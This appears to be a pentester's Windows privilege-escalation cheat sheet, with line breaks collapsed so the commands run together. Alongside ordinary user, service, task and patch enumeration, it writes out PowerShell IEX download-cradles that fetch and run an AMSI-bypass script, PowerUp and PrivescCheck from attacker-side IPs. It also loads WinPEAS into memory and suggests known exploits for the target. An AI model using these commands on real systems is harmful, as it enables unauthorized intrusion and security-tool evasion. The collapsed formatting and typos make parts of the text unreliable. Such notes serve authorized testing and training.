# Check current username and their privilegeswhoamiwhoami /priv# System Information sysinfo# List disksfsutil fsinfo drives# Enumerate unmounted diskmountvol # check users net usernet user /doamin net group net group /domain# show info on a particular usernet user <username># hostnamehostname# AMSI bypass> powershellPS> IEX (new-Object Net.WebClient).DownloadString('http://20.0.0.200/privesc/amsi.txt')PS> IEX (new-Object Net.WebClient).DownloadString('http://20.0.0.200/privesc/my-am-bypass.ps1')# WinPEAS in disk./winPEASAny.exe# WinPEAS on memoryPS> $url ="http://10.10.14.16/privesc/winPEASany.exe"PS> $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
# List running servicesnet startsc querywmic service getwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartNamesc qc <service name>sq query <service name># List running processes tasklist /SVCwmic process# List all running process by Administratortasklist /fi "USERNAME eq NT AUTHORITY\SYSTEM"tasklist /fi "USERNAME eq NT AUTHORITY\SYSTEM"/fi "STATUS eq running"# Check all listening portsnetstat -ano# Scheduled Tasks schtasks /query /fo LIST /v > log.txtcat log.txt | grep "admin \|Task To Run"schtasks /run /tn "taskname"# List scheduled tasks only for a current user context. You need to be SYSTEM to see all tasks.Get-ScheduledTask# Powrshell to organize the informationGet-ScheduledTask-TaskPath "\"|ForEach-Object { [pscustomobject]@{ Server = $env:COMPUTERNAME Name =$_.TaskName Path =$_.TaskPath Description =$_.Description Author =$_.Author RunAsUser =$_.Principal.userid LastRunTime =$(($_|Get-ScheduledTaskInfo).LastRunTime) LastResult =$(($_|Get-ScheduledTaskInfo).LastTaskResult) NextRun =$(($_|Get-ScheduledTaskInfo).NextRunTime) Status =$_.State Command =$_.Actions.execute Arguments =$_.Actions.Arguments }}# Patch Infosysteminfowmic qfe get Caption,Description,HotFixID,InstalledOn# Run PrivescCheck.ps1> powershell PS> iex (new-Object Net.WebClient).DownloadString('http://10.10.14.127/privesc/PrivescCheck.ps1');Invoke-PrivescCheck -Extended
# Run PowerUp.ps1PS>iex (new-Object Net.WebClient).DownloadString('http://192.168.49.124/privesc/PowerUp.ps1')|Import-Module PowerUp.ps1PS>Invoke-AllChecks# Run Windows Exploit Suggester NG# Obtain systeminfo.txt from a Target machine./wes.py --update./wes.py systeminfo.txt -e # only known exploit ./wes.py systeminfo.txt # all vulnerabilities